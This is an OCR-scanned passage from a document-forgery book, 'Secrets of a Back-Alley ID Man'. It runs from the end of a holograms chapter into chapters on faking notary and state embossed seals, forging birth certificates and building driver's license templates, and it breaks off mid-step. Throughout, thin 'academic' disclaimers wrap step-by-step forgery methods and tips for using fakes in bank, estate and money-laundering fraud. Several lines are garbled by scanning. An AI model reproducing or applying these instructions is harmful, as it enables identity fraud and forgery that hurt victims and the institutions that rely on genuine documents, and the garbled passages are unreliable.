amazed by the quality of the "hologram" seemingly +embedded in the diffractive film. It is a rather impressive sight, especially if you've ever thought a +hologram's presence precluded you from reproducing a given ID. You may get so excited that you +stuff the holo into a lamination pouch along with a template and back. But as soon as you run it +through the laminator all your high hopes crumble into a pile of disappointment. What went wrong? +You protected the grating, you didn't overheat your laminator, you did everything right. . . but your +results are marginal or nonexistent. +Actually, doing all of the above sometimes yields excellent results—sometimes. But I wouldn't count +on it. To ensure that your hologram shines through, you'll need something highly reflective beneath it +to bounce light back through the hologram and up to the viewer's eye. That's when the magic happens. +40 + +HOLOGRAMS +Certain ID templates may be inherently reflective. Other times it is better to provide a small +amount of metallization underneath the hologram to ensure a holographic effect. +Use the "Poor Man's N.J. Holo" method (described in Chapter 3 of Identity, Privacy, and Personal +Freedom: Big Brother' vs. the New Resistance) to place a near-invisible amount of Interference Gold paint +directly onto the ID template where a hologram. That should do it. If you come up with other meth- +ods or refinements to this method, please visit my discussion board and share it (see the Appendix). +NOTES +1. Charrett, Identity, Privacy, and Personal Freedom: Big Brother vs. The New Resistance. +2. You can link to my discussion board from my Web site http://www.phreak.co.uk/sxc. (Please see the Appendix for +more information about finding me on the Web.) +3. Buried microstructure films will not exhibit this quality. +4. M. Grumbacher, Inc. is a U.S. company headquartered in Bloomsbury, N.J. Its damar varnish product contains gum +spirits of turpentine, heptane, isobutan-propane mixture, isopropyl alcohol, and prime damar resin. +5. When ordering sample material, ask the sales representative to label the embossed side. The embossed side of the +HG-107 film is the side that reacts more strongly to your fingerprints. Other surface relief microstructures may also +exhibit this characteristic. +41 + +Chapter 5 +Embossed Seals and +Other Fun Stuff +This chapter is an academic study of how unmutual underworld overlords forge embossed seals, +such as those found on notarized legal instruments. An embossed seal adds a nice touch to certain +identity documents as well. For example, a state-issued marriage certificate is usually embossed with a +state seal. A city-issued birth certificate abstract usually has a city seal embossed smack dab in the mid- +dle. An application for voluntary administration of an estate (not ID exactly, but it can come in +handy) usually requires a notary's seal at the bottom. +I've also included a small section on bar codes, ultraviolet-sensitive ink, and magnetic swipes. +EMBOSSED SEAL +I must first point out that you could borrow an unguarded embosser to "officially" notarize +something. Many ID books correctly suggest you can find various stamps, seals, and embossers at +yard sales and flea markets. I agree: keep an eye out so you can see where lawless larcenists buy such +unspeakable contraband. You could also use forged credentials to get a fake driver's license, which +will allow you to notarize any document you'd like in your fake name. But this is a book about how +good-for-nothing bastard criminals manufacture and forge ID documents, so we'll just skip all those +tricks and get right to the nuts-and-bolts, hands-on document forgery methods used by modern-day +cretins and crackpots. +43 + +SECRETS OF A BACK-ALLEY ID MAN +Depending on your desired level of quality, you could forge a notary's seal in several ways: +• Silver dollar method +• Amusement park coin method +• Wood block, etching, and sand carving method +• I Love Super Sculpey™ method +Silver-Dollar Method +Using a silver dollar and a rubber mallet (or shoe) is a quick way to lend the impression of an +embossed seal. Lay your document over a silver dollar and then smash it with a rubber mallet— +voila!—a raised seal. It is preferable to use a Morgan dollar to an Eisenhower dollar because the for- +mer is less familiar and reduces the chance of catching somebody's eye. Also be careful not to do too +good a job. Basically, all you want is the edges and a wee bit of surface area to emboss the paper. You +do not want the words "ONE DOLLAR" to stand out, or your little ploy will be for naught. Delinquent +dolts use this method to add a genuine touch to hospital birth records passed off to low-level clerks +(or medium-level clerks with thick glasses). +Amusement Park Coin Method +Amusement parks, arcades, and novelty greeting card shops sometimes have a machine that allows +you type your name or other statement on a coin. Teenagers usually write things like "MARY LOVES +JOHNNY 4-EVA" and "BLINK182 KICKS ASS." Document forgers, however, write things like "JAMES +DEAN—NOTARY PUBLIC" or "NOTARY PUBLIC—NOTARY PUBLIC" or "CITY OF SAINT LOUIS." +You get the idea. They then use the previously outlined silver-dollar method to "notarize" documents. +A money launderer might use this method to notarize an "Application for Voluntary Administration" +of a 50-year-old unprobated estate. The forthcoming probate court certificate combined with a fake +driver's license looks very convincing to the account specialist at a local bank. Mo-fo's move molto +mullah through estate bank accounts in exactly this way. +Wood Block, Etching, and Sand Carving Method +If you have a tiny router or engraving tool, you can make your own seal out of wood. Simply draw, +paint, print, transfer, or stencil the design onto a piece of hardwood, such as maple, ash, beech, or oak +cut from a pristine area of the main tree trunk. Do not use softwood, such as pine, or your hours of +effort will be good for only one or two embossings. Use a small router1 or engraving tool with a +Dremel bit to rout it out. You could even use a sharp hobby knife if you're careful and patient. +More serious identity crooks make a photo-resist stencil of the seal and sand carve it using a spe- +cial artist's tool. Such tools are dropping in price and becoming more portable and easier to use. Keep +your eye out for portable sand carvers and accessories if you're serious about experimenting with +homemade seals. +These processes may seem rather elaborate, but keep in mind that in days of old the king's royal +seal was made out of wood and they did not have access to routers, etching tools, photo-resist stencils, +and sand carvers. +I Love Super Sculpey Method +Crafty grafters know about a nifty little product called Super Sculpey, available at any decent arts +and crafts store. Sculpey is special sculpting putty that I've adapted to a special use. You can press +Sculpey onto a three-dimensional object to make a perfect mold of it. Alternatively, you can press +Sculpey into a mold to replicate a three-dimensional object. Hmmm. Big froinkin' deal, Charrett, I'm +skipping ahead to the next chapter. +44 + +EMBOSSED SEALS AND OTHER FUN STUFF +Notary embossed document seen from behind for clarity. This is the same document as seen from the front. A silicone +Notice how this is a good, full impression. Some notaries mold must be made from the front of a document. +have weak hands and give you lame impressions that +aren't good enough for duplicating with the Super Sculpey +method. +Wait! You have to let me tell you why I Love Super Sculpey! Bear with me. +A notary's embossing plate is a three-dimensional object, right? So, if you are lucky enough to be +alone with a notary's embosser for a few minutes, you could use Sculpey to make a mold of it. +Well, gee, thanks, Charrett, when in hell will I ever be alone with a notary's embosser? You suck. +Now wait a minute there, cowboy, those is harsh words. The good news is that we ordinary +schmucks—the ones who'll never have a snowball's chance in hell of ever being alone with a notary's +embosser—can use Sculpey in a different way. +Although you wouldn't normally think of it as such, the impression an embosser makes onto a +piece of paper is actually a mold, innit? Certainly even we poor schmucks have a notarized document +somewhere in our house. No? Well then, it's a simple matter to go the city clerk's office and get some- +thing notarized. Make sure the notary squeezes that embosser tight so you have a nice mold to work +from. Tell him or her that you need a strong impression so it shows up on the photocopy. +When you get home, take a 3/4-inch ball of Super Sculpey and work it in your hands until it is very +warm, soft, and pliable. Then press the Sculpey into the back of the embossed seal. Gently pull the +paper from the Sculpey to reveal your new notary embossing plate. Bake it in the oven at 270 degrees +for 15 minutes.2 Serves one. Recipe may be doubled if you are expecting guests. +Once you pull Sculpey from the oven, let it cool for a couple hours. After that, your embossing +plate should be hard and ready for service. +45 + +SECRETS OF A BACK-ALLEY ID MAN +/App/y 100-percent siiicone to front of document. +Use a disposable cup to press siiicone into the notary +impression. Do this gently and don't over-squish. Let it set +for at least 24 hours. +Peel the paper from the dried siiicone. Rub off the paper Siiicone molds of Connecticut, Massachusetts and New +residue in warm soapy water. You now have a very durable York notary seals, +mold of a notary seal. +46 + +EMBOSSED SEALS AND OTHER FUN STUFF +Press a warm ball of Sculpey into the mold. Do this as evenly +Peel the mold from the Sculpey. Place the ceramic cup with +as possible. You'll have to press harder than when you +Sculpey into the oven (see procedure above). +squished the silicone onto the paper, but you still don't +want to flatten it completely. +Reusable Silicone Mold +There are two drawbacks to making a Sculpey embossing plate directly from a paper mold: +• The action of pressing into the paper causes you to lose some "edge" to the finished product. +• A deeply embossed paper will most likely tear when you pull the Sculpey from it. Thus you end +up "breaking the mold." +Wouldn't it be nice to create a reusable mold? You can find all sorts of mold-making products in +an arts and crafts store, usually in the $10 to $20 range. But none of them work as well as a $2 tube of +kitchen and bath silicone sealant, which you can get from your local hardware store or the nearest +Home Depot. +Simply squirt some silicone sealant on top of the notary's seal on the front of the page. Press the +bottom of a plastic drinking cup onto it to get a good impression. Leave it sit overnight. The next day +gently peel the cup off the cured sealant. Then, even more gently, peel the paper from the sealant +Some of the paper will stick, but don't sweat it. Let it dry a couple more hours now that the ends are +exposed to the air. Later on, wash out your mold with warm, soapy water. Don't be afraid to use a little +elbow grease when cleaning; the silicone is quite durable. Once done, you can press Sculpey into the +mold to create as many embossing plates as you want. +By the way, if you do happen to be left alone overnight with a notary's embosser, you can use the +silicone method to create a reusable mold of the positive plate. Just a thought. +As you'll note from the photos above, I pressed the silicone mold into the Sculpey on the bottom of +47 + +SECRETS OF A BACK-ALLEY ID MAN +a ceramic coffee cup. I used the flat bottom of a , +drinking glass as a press. This helps ensure that +the finished product is flat rather than wavy or +bumpy. Keeping it flat will make better impres- +sions and will help it last longer. The ceramic cup +stayed with the Sculpey during baking. You do not +want to peel the Sculpey and then place it in the +oven. Peeling first would only distort it. +Cook Sculpey as described earlier. +How to Use the Sculpey Embosser +The best way to use your embosser is to care- +fully impress documents with a very soft pencil +eraser. Place the document over the Sculpey +embosser and use a soft pencil eraser to emboss +the paper a little at a time. You can leave the +Sculpey on the ceramic cup if you'd like, which +would provide the strongest base for it since this +is where the embosser was "born," and the cup's +contours match those of the embosser. +Take the cup and Sculpey out of the oven and let cool for +OTHER FUN STUFF +an hour or so. You now have your own notary embosser. +Since this is only an academic study, you must now +Innovators of new ID often feel tripped up +destroy it. +by ultraviolet-sensitive ink, magnetic swipes, bar +codes, fingerprints, and other harbingers of +tyranny—or rather, as we stand-up citizens pre- +fer, necessary tools to control the masses. +Some driver's licenses are stamped on the +back with special ink that shows up under ultra- +violet (UV) light. Usually the stamp is the state's +logo or some glib saying, such as "Just Say No." +Shameless sinners replicate this security device +with UV-sensitive fluid readily available in art +supply stores or office/specialty supply sites on +the Internet. Certain types of highlighters have +been rumored to do the trick as well. +Bar codes are now easily generated with per- +sonal computers, and there's even a shareware +program that produces encrypted bar codes, +which look remarkably like the real thing (such +as on an Arizona driver's license), though it +probably doesn't use the same encryption +scheme as the Arizona Department of Motor +Vehicle (DMV). Bar code fonts are also available +on compact disk or via Internet download. Of Hey! Didn't I tell you to destroy the embosser? Oh, well, if +course, the gifted artist could surely draw a few you absolutely must know, here's how bad people abuse +Sculpey embossers. Place the document over the embosser +lines of varying thickness to imitate a bar code. +and then impress it with a soft eraser. + +EMBOSSED SEALS AND OTHER FUN STUFF +Photo of the embosser, the embossing implement, and the +Looky, looky. What do we have here? +finished product. +Massachusetts great seal ready to be lifted. You can use the +From paper to silicone to Sculpey and back to paper. Fun, +foregoing Super Sculpey method to lift an embossed state +fun, fun. Now destroy that embosser like I told you I +seal and make an embosser from the mold. + +SECRETS OF A BACK-ALLEY ID MAN +Magnetic-ready PVC (CR-80) cards are avail- +able from printing supply companies, and both +Eltron and Fargo make printers that can print, +laminate, and encode the magnetic stripe on +PVC cards. These printers are now selling for +under $10,000. +The foregoing are just some random ideas +that I may expand upon in a future book. But I +have to draw the line somewhere on security +devices because things are changing as we speak. +If I were to go into details on everything, this +book would never get to print. I've given you the +current creme de la creme. The top security hur- +dle for ID forgers will soon be something else. +Smart cards? Microchips embedded in the cere- +bellum? Bar codes tattooed on our feet at birth? +Who knows? It's all possible. You can rest assured +that our government is exploring all of these pos- +sibilities . . . for our own safety, of course. +Big Brother is looking out for us. +NOTES +1. In actual practice a router is only good for clean- +ing out the larger areas of the design, even when +using the smallest bit. The details will have to be +handled with an etching tool or a stencil knife. +2. These are the directions on the package. Don't +use these settings in a Toast-R-Oven because the +heating elements are too close to the Sculpey and I just sold Wrigley Stadium and my prized horse's ass to Big +it will boil. In practice, I've found that a much Brother. Do you think he'll notice Alice N. Wonderland has +lower setting (150-170 degrees) for a longer time her commission in Connecticut, and that the document was +is more effective. Also, don't get Sculpey wet signed on February 3 7 ? Too bad we had to pixelate the +before baking. Sculpey no likey wet wet. notary's surname. It was a very nice print! +50 + +Section Three +PUTTING IT +ALL TOGETHER + +Chapter 6 +Birth Certificates +Made Easy +Author's note: I've laid out this section to provide a thorough examination of the various tools and +techniques ID forgers use. To eliminate redundancy I've selected diverse documents, each highlight- +ing a specific technique or process. +Forging original hospital-issued birth certificates is rife with problems. The document forger must +find the appropriate paper, which is often no longer manufactured. Forgeries of this kind often +involve the services of a professional printer to get the right ink effect and typesetting. This obviously +limits the forger's possibilities unless he is a pressman by trade or trusts one with his freedom. A good +replica must be properly aged. There are myriad solutions to these hurdles, but they seldom lend a +natural effect. +Good solutions have been presented in other texts, and such information is invaluable. But how +many people still have their original hospital birth certificates? And of those who do, how many carry +them around for identification? More often, a person carries a city-issued abstract record of birth. +ABSTRACT RECORD OF BIRTH +Go to the town in which you were born and ask at the appropriate agency (e.g., city or county clerk's +office) for a copy of your birth certificate. Most clerks will look up the certificate and type the vital infor- +mation onto a card. They emboss the card with the city seal, laminate, collect $4 from you, and hand you +an abstract record of birth. This card is what most people carry in their wallets as a birth certificate. +Fortunately for document forgers, this card is much easier to reproduce than a birth certificate. +53 + +SECRETS OF A BACK-ALLEY ID MAN +Not only is this record an abstract, it is completely surreal. I've never been to Independence, nor have I any idea what that +town's abstracts look like. The Independence, Missouri, seal was taken from the city's Web site, shrunk down in PhotoShop, +and pasted into its own layer. +54 + +BIRTH CERTIFICATES MADE EASY +PROCEDURE +These are the steps used by the criminal element to forge birth certificate abstracts. +• Design template +• Steal city seal +• Attest +• "Type in" vital statistics +• Print +• Emboss with city seal +• Laminate +Design Template +You can use the format in the top photo on page 54, or you can base your template on your target +city's actual format from the year the record was supposedly made.1 The heading font used in the +above abstract is Old English Text MT. This is a wonderfully useful font, and I suggest you download it +from the Internet or get it from a friend's computer if you don't already have it. +Steal City Seal +Use a scanner to scan a document containing your city's seal or, if your city has a Web site, down- +load the image from there. You want a black and white version only. Once imported into PhotoShop, +choose: Select, Color Range, Shadows. This will select only the black areas. Copy this and paste it into +its own layer. You now have a copy of the city seal that can be imported into other documents. +Attest +Now, make an "Attest" signature. You can invent one yourself and scan it into your computer, or +you can hijack a signature from somewhere else—even a scanned copy of an actual birth record or +abstract. Use the above PhotoShop technique to isolate the signature from its background. +"Type In" Vital Statistics +The abstract record in the top photo on page 54 has no actual typing on it. Make a vital stats layer +using the font Courier New, which is a good "typewriter" font. Once done, select the entire layer using +the marquee tool and choose Image, Rotate, Arbitrary, and type in 1 degree. It does not matter +whether you rotate 1-degree clockwise or counterclockwise. This lends the effect of a preprinted card +that has been manually fed into a typewriter. Most of us have experienced this when filling in a form +with a typewriter—the form never feeds in "level" no matter how hard we try. One degree of "unlevel- +ness" implies authenticity. +Print +Once done with tweaking the template and vital info, print it out. This is a simple step, but one +that must be considered carefully. Will you be adding a seal to the card? If so, what technique will you +be using? If you have access to your city's embosser, then go ahead and print the abstract onto a heavy +stock card, such as Alps photo paper. If you'll be using the I Love Super Sculpey Method (see Chapter +5), then you'll be better off printing the abstract onto a thinner paper, such as HammerMill Laser +Paper, which can be readily embossed using that method. +Emboss with City Seal +You can often get away with omitting this step because many clerks don't know to look for iit. This +55 + +SECRETS OF A BACK-ALLEY ID MAN +stems from the fact that each city +does things differently. This is +changing as Big Brother moves +toward interjurisdictional stan- +dardization, but it will still be +decades before all cities share a +common policy. +Even though it is thick, the +Alps photo-quality paper can be +embossed using the Sculpey +method. The embossing looks +faint, but this is often the case with +real documents anyway. +Surprisingly, despite the thinness +of the Alps VPhoto paper, it can- +not be embossed due to its compo- +sition. These are things a good +crook needs to keep in mind. Template of birth certificate abstract with imported city seal in its own layer. +Laminate +It is best to buy or borrow a +professional laminator for this +step. Remember that certain +inkjet photo papers will react +with the vinyl chloride in the lam- +ination pouch, as will the Alps +photo paper. In these cases, +you'll need a protective layer +between the lamination pouch +and the card. +STATE "LONG FORM" +RECORD OF BIRTH +Birth certificates issued by +state vital records offices are often +legal-sized photocopies with the +state's great seal embossed at the +bottom. Bureaucrats affectionately +refer to these as "long forms." +(They must've reached into their +magic sack of creativity to come up +with that term.) Unlike abstracts, +you do not carry around a long +form in your wallet. Bureaucrats +request the long form when, for +The USI FX-400 is a sturdy and dependable heat laminator. USI's current com- +example, you need to prove your +parable models sell for between $50 and $130 new. I saw a used model on +Irish ancestry upon applying for +eBay with an opening bid of $5. +56 + +BIRTH CERTIFICATES MADE EASY +Here is a completed template ready to be placed in a photocopier's paper tray. Place it in the tray, and appropriately position +the vital record of your choice or creation in the copy area. Practice first by placing several blank sheets of paper in the copier's +paper tray. Make a small mark on a few sheets to determine whether birth certificate template should be fed in face up or face +down. +57 + +SECRETS OF A BACK-ALLEY ID MAN +See? You were right. A depraved lunatic can make a great seal embosser using the Super Sculpey method. +dual citizenship and an Irish passport.2 Motor vehicle registries in most states accept the long form as +identification. The same type of form as a marriage or death certificate may also come in handy, espe- +cially when opening joint or estate bank accounts. +The Massachusetts long form is a typical example. An archived birth (or marriage or death) certifi- +cate is photocopied onto special copy paper. The special paper is really just plain copy paper with a head- +ing and some official-looking red numbers at the top. The state's great seal is embossed over a green +background at the bottom near a preprinted signature of the registrar. The special copy paper is placed +into a photocopier so a congressman's niece can sell you "certified" copies at eight bucks a whack. +It's all ink and toner, baby, except for that nasty embossed seal. +If you've been reading this book's chapters in order, you may be thinking a depraved lunatic could +readily replicate the state seal using the Super Sculpey method described in Chapter 5. The green +background is only a minor problem. You can print it from just about any color printer. I d prefer a +laser or MD printer (Alps) printer to ensure that the ink won't run at an inconvenient moment. +Green magic marker over a stencil would be a respectable "old school" approach. +But what about the vital statistics? The information contained in the birth record is entirely up to +you You can copy an existing record and ghost yourself in as is, or you can use Wite-Out and a match- +ing typeface to change an existing record to something that better suits you. You could also make a +record from scratch, though this would be much more involved. If you opt for the latter, be sure you +have an actual record from the same year to use as a guide. Some bad people scan several records into +their computer and then use PhotoShop to cut and paste together a composite record of their own +Frankensteinian creation. +58 + +BIRTH CERTIFICATES MADE EASY +The above birth certificate abstract techniques can also be used to make firearm IDs, video store +membership cards, employment badges, student IDs, and more. This is just a taste of what you can do +at home. The following chapter delves into the more sophisticated techniques used to replicate state +driver's licenses. +NOTES +1. 'Year the record was supposedly made": this is a common mistake, though not a very critical one. Most clerks have +no idea which styles were issued in which cities in which years. However, if you're going to take the time to copy a +city's template, you may as well make sure the card style was used in the year your record was supposedly issued. +2. See previously mentioned Identity, Privacy, and Personal Freedom: Big Brother vs. The New Resistance. +59 + +Chapter 7 +How Crooks Construct +Kick-Ass Driver's +Licenses +By the time some of you read this, the states below may have already changed their license format. +As this is written, states are scrambling to keep one step ahead of document forgers (although I tend +to think it's the other way around), and many new security devices are in the works. The feds are push- +ing Orwellian laws on the states, attempting to force the use of biometric identifiers on every state +license. Digitized photos and fingerprints lurk just around the corner, my friends. What will ID forgers +do then? We can only wait and see. This chapter shows what they're doing now. The techniques in this +chapter will be useful to misanthropic motherfuckers for many years to come. +Even expired licenses have their uses. Since the expiration date on a driver's licenses only relates +to one's legal driving status, many non-Orwellian establishments accept old licenses as ID. There are +many places that have no established policy that a driver's license must be current. Often, it is up to +the clerk whether to accept an outdated license as ID. Many liberal-minded people have no problem +doing just that. If you aren't lucky enough to find liberal-minded people, apathetic and unobservant +clerks are not in short supply. For various valid reasons, old IDs are often used to open bank accounts, +establish mail drops, get library cards, and perform a host of other civic activities. +What are some valid reasons for having an expired driver's license? +• An elderly person stops driving so there's no point in renewing the license. +• You are diagnosed with a disease that precludes your driving (a medical bracelet or "dog tag" is +convincing backup ID in these cases). +61 + +SECRETS OF A BACK-ALLEY ID MAN +• A middle-aged man might say, "I stopped driving after my second heart attack—doctor's +orders." +• A person on crutches or in a wheelchair might say, "As my MS progressed I saw no point in +renewing my driver's license." +• A young person may say, "I was found at fault for a car accident in which my passenger—my +best friend—was killed. I don't drive anymore." +These are just a few reasons that popped into my head as I was writing. I'm sure crafty con men +have many more. +I'm equally sure those same crafty con men are well aware that many state "nondriver identifica- +tion" cards are valid indefinitely. I have a friend with such a card from the 1970s. He still uses it +today to cash checks. So you can see why this chapter's techniques will be in wide use for the next +few decades. +We'll begin by outlining the basic procedure for constructing a novelty driver's license and then +move on to procedures specific to a given state. This is the basic procedure for a standard laminated +ID card-style license. +MINIMUM TOOLS REQUIRED +A very resourceful person can construct a novelty ID for nothing. You need not own any of the +tools nor spend any money, provided you have access to the following: +• A computer running PhotoShop or comparable software +• A high-quality color printer +• A laminator +• The Internet +If it sounds like a lot to ask for, consider this. I can get in my truck right now, drive 4 miles to the +local community college, sit in the library for a couple of hours, and walk out with a novelty ID ready +for lamination. If you work in an office, you may have ready access to a laminator. If not, Kinko's, Copy +Cops, Mail Boxes Etc., or a similar facility will do it for a buck or two. +Many public libraries these days—even in mid-sized towns—have rows and rows of computers with +Internet access and graphics software networked to a color printer. +When sticky-fingered filchers live too far away from such valuable resources, they buy the necessary +tools, make the IDs they need, and then return the goods to the store within 30 days for a full refund. +As you can see, there's more than one way to skin an ID. +BASIC PROCEDURE +We'll be discussing several different driver's licenses, each with its own distinct qualities. However, +they share some basic construction steps. Rather than repeat the steps for each license, we'll outline +them here and refer back as needed. +Obtain a Template +To make a novelty driver's license you'll need a template. If you've been with me since the begin- +ning, you already know that a template is an actual-size computer image of the real license you'll be +making, hopefully front and back. If you can't get the back, don't worry too much. I'll show you some +stock backs that philandering phonies like to use.1 +62 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +There are three ways to get a template for any givenstate. +• Design it yourself. +• Scan it into a computer. +• Download it from the Internet. +Design It Yourself +If you have great artistic skills, you can create the background and state logos using a sophisticated +drawing program such as PhotoShop or Corel Draw. You can also stick with more traditional media, +such as oil paints, colored pencils, or markers, and then scan your finished product into a computer +to add text and a photo. +Some IDs are simple enough to copy even if you lack artistic skill. +Scan It into a Computer +If you have the actual license, you can scan it into a computer. If your final product will be printed +out with an inkjet or laser printer, you'll need a minimum 600-dpi scan. If you're going to use a dye- +sub printer, such as the Alps, you can get away with 200 to 300 dpi. +Download It from the Internet +The Internet is usually your best bet. Not only can you find abundant templates, but you can often +get fully layered PhotoShop files that have already been reworked by someone. You need only add +your photo and identifying information to the file and print it out. Usually, you'll have to trade some- +thing of equal value or pay a small premium to receive these files. +Do a Preliminary Printout +Once you have a template, print it out onto regular copy paper and verify its dimensions against +an actual license or the actual-size pictures in the I.D. Checking Guide. Use a ruler that measures in +millimeters or sixteenths of an inch. Keep all measurements within lmm or 1/16 of an inch. Check +the following: +• Height and width2 +• Size of logo +• Position of all text boxes +• Distances between text lines +• Length of text lines +• Height of fonts +• Anything else that catches your eye +If you are using a JPEG image or a poorly reworked PhotoShop template, some or all of these mea- +surements may be off. If so, make corrections in the following manner. +• Measure the height and width of the actual license. +• Resize the template using these dimensions. Do not change the aspect ratio; that is, checkmark +the constrain proportions box. +• Recheck all of the above measurements. +Things may still be off at this point, but if you have the proper height and width, you can adjust +everything else as you rework the template. Even when I have a template that is perfect, I redraw lines +63 + +SECRETS OF A BACK-ALLEY ID MAN +and retype text to eliminate fuzziness. You will +absolutely need to do this when working from a +plain JPEG image. If working from a layered 1998 +file, you'll have to decide for yourself which ele- +ments need rework. I.D. +PHOTOSHOP 101: TEMPLATE +ENHANCEMENT TRICKS +CHECKING +Whether you've designed it yourself, down- +GUIDE +loaded a JPEG image from the Internet, or fina- +gled a layered PhotoShop document, your tem- +plate will seldom be perfect. The following +tricks will help you enhance even the worst +JPEG image. This section will also serve as an +introduction to PhotoShop for those who are +unfamiliar with it. +Adjust Image Resolution +Since adjusting the dpi of an existing image +really doesn't change its resolution, only do this +if working with a particularly bad JPEG image in +need of total rework. If this is the case, follow +these steps: +The I.D. Checking Guide is published and distributed by The +1. Open JPEG image in PhotoShop. Driver's License Guide Company. Other organizations have +been known to distribute the guide. I got mine from the +2. Resize image to your target width and +Florida Banker's Association. If you have trouble getting it, +height, specifying at least 300 dpi. +see Chapter 3 of my book Identity, Privacy, & Personal +3. Save the image as a PhotoShop +Freedom: Big Brother vs. The New Resistance for some tips +document. on how to obtain it. +4. Now use this horrible image only as a +guide for a complete redo. Call this layer +"placement." +5. Start a new layer called "background." +6. Follow the remaining enhancement techniques given below. +Background Layer +Sometimes the background layer can look splotchy due to imperfections in the original docu- +ment. In most cases you'll want to clean this up. Follow these steps: +1. Use the marquee tool to select the background area. +2. Use the eyedropper tool to pick up the average background color. +3. Use the paintbrush tool on its largest setting to repaint the selected area. +Repeat steps 1-3 above for all major background areas. Make sure you are reworking the correct layer. +Redoing Logos and Seals +Most driver's licenses contain the state's DMV logo or great seal, sometimes both. Pros isolate +64 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +these images to their own layer. This is a prob- +lem if data fields overlap the image because it's +difficult to select the image without selecting +the data fields. Choosing Select, Color Range +can sometimes solve this problem, but then +white "holes" are left in the image where the +data fields were. This is okay if you don't mind +filling all the holes back in, which is exactly what +many document forgers do. +Sometimes it's possible to delete a logo or +great seal altogether and paste in a new one. To +do this you'll need a good scan of the image, be +it logo or seal. If it's a simple enough logo, like +New Jersey's, you can draw it yourself. +STATE Ob' MAINE Another alternative is to write your +DMV/RMV/MVB (or whatever those bastards +<\RTMENT OF THE ATTORNEY GEN +call themselves in your state). Make sure the let- +ter requires a response. When they respond, +AUGUSTA, MAINE 04333-0006 scan the logo off their letterhead. +You can also visit your state's DMV on the +Internet. Usually, you can find the logo at the +top of the DMV's home page or embedded in +March 29, 2000 +the background somewhere. Systematically fol- +low their links until you find a suitable image. +Once found, right-click it. Select "Save Image As +. . ." and save the image to your hard drive. +Visit www.state.YS.us, where "YS" is the two- +letter abbreviation of your target state. You +might find what you're looking for there. There +is a virtual gold mine of symbols and seals at: +http://www.netstate.com/states/symb/seals. +Go hog-wild downloading state seals and +spread them across the Internet before this site +closes down. +Once you have the image, use PhotoShop to +get it reworked, resized, and adjusted to the +proper color and opacity. Here is an example. +Try this to correct fuzzy logos and seals: +1. Cut the logo from the background +layer and paste it into its own layer +called "logo." +2. Select the logo using the marquee tool. +3. Use the sharpen command (Filter, +Sharpen from the main menu) and see +if that improves the logo to an accept- +Need a seal? Write to the state and await a response. Here +able quality. +are the letterheads I got back after writing the Maine and +Massachusetts state secretaries offices. +65 + +SECRETS OF A BACK-ALLEY ID MAN +/ downloaded the great seal of Illinois from the state's Web site, used the Select, Color Range function and selected "Shadows,' +which worked well enough for this seal of mostly dark colors. You may have to select colors individually when working with +other seals. In the Select, Color Range dialog box, choose the eyedropper with the + symbol to keep adding colors until the +entire seal is selected. +Once you've selected all the colors you want, copy and paste the seal into its own layer. Highlight the layer and select an opaci- +ty of 25 percent (actual opacity will vary depending on the ID). +66 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +layer with overlapping layers turned off. At 25-percent opacity, a 72-dpi Web image +Here's the finished seal shown in its own +does the trick. +You can also clean up your logo or add detail to it by zooming in and using the paintbrush or pen- +JLTtt toil settiTg ^remove irregular specs and splotches from the edges, use the lasso selec- +tioXTwMcn 2 wf you to select irregularly shaped areas. It's an odd tool to use at first, but once +you get used to it, it can really work wonders. +If you're working from a previously reworked template, you may have a clean logo that is the +wrong size or color. In this case, follow these steps: +1. Cut the logo and paste it into its own layer. +2 Resize it to the proper dimensions by choosing Effects, Scale. +I Click Image, Adjust, Replace Color from the main menu to adjust the color of the logo. +Redo Fonts +There will be times when you'll want to redo the fonts on an ID template due to a bad scan +But even when you find an acceptable font, there are a few more thing, to consider. Among these +are the following: +• Unusual characters +• Character size +• Character spacing +• Line spacing +67 + +SECRETS OF A BACK-ALLEY ID MAN +Character spacing can be stretched by entering a positive number in the Spacing box or compressed by entering a negative +number. As illustrated, Arial Narrow, 24-pixel bold, with spacing set to -7 will match the font of a Maine license back. +Unusual Characters +No, not the ones you meet in Harvard Square or on Sunset Strip. I'm talking about fonts. +Sometimes, even when you've found a pretty close match for a font, there is one character that's still +unacceptable, usually because of some quirk that it has or doesn't have. +The best example I can think of is the dot matrix zero with a diagonal line through it. You see this +character on state driver's licenses that have data fields filled in by a dot matrix printer. A good match +for this font is called Bitmap. But the Bitmap zero doesn't have a line going through it. This is fine if +you don't need a zero in your document, but what if you do? +This is really not a difficult problem to solve once you're aware of it. Diabolical dirtbag +document forgers will go so far as to edit the font using a program such as Softy, the shareware +birthchild of one Dave Emmett. Both Softy and Dave can be found at http://users.iclway.co.Uk/l.emmett. +If this address has changed by the time you read this, fear not. Softy is well documented on the +Internet, and support sites should pop up in any search engine by entering the keyword "softy." +For us innocent folks who don't need to edit many fonts, it's a simple matter to draw a line over +the zero using the PhotoShop line tool. Alternatively, you could paint in the line or other squiggle one +pixel at a time after zooming in on the offending character (Ctrl +). Copy your special character and +paste it wherever needed on your template. +Another good dot matrix font is called, well, Dot Matrix. Bitmap is better for a dense dot matrix +effect, but Dot Matrix is better for sparse matrices (like those of the archaic 7-dot printers). +68 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +Character Size +You would think you could simply select the same font size the state uses, but even if you have this +information, this is not always the case. Consider this: You go to the DMV and fill out a license infor- +mation card. The information headings are in Courier 12 point—an easy font to reproduce. But then +what happens? The information card is placed in a camera, where it is shot down to some wretched +fraction of its original size. When felonious philanderers try to reproduce the license on a computer, +Courier 12 point is way too big. So they try 10 point, which is still a bit too big. When they try 9 point, +they realize it's too small! +Sometimes the difference is so small that it's not worth trying to fix. But other times, shyster char- +latans insist on getting the font size exact. Fortunately, PhotoShop allows you to adjust the font size in +terms of pixels, which gives you total control. If you find yourself between standard "point" sizes, +adjust your font size in terms of pixels instead. Say Courier 9 point is equal to a setting of 20 pixels and +Courier 10 point is equal to a setting of 30 pixels (not actual numbers, for example only). You can +force a font size between 9 point and 10 point by selecting a pixel setting between 21 and 29. Using +this technique, you can get your font sizes exact. +Character Spacing +Even after you've adjusted the font size you may realize that the space between characters still isn't +quite right. Again, PhotoShop comes to the rescue. +Line Spacing +You can manually adjust line spacing by selecting the line with the marquee tool and sliding it up +or down. +Character Size and Spacing +It is often useful to use PhotoShop's Scaling feature to simultaneously adjust character size and +spacing. Get the font, character size, and spacing as close as you can by using the above techniques. +Then use the following procedure to scale the text. +1. Select the text you wish to stretch or compress. +2. From the main menu 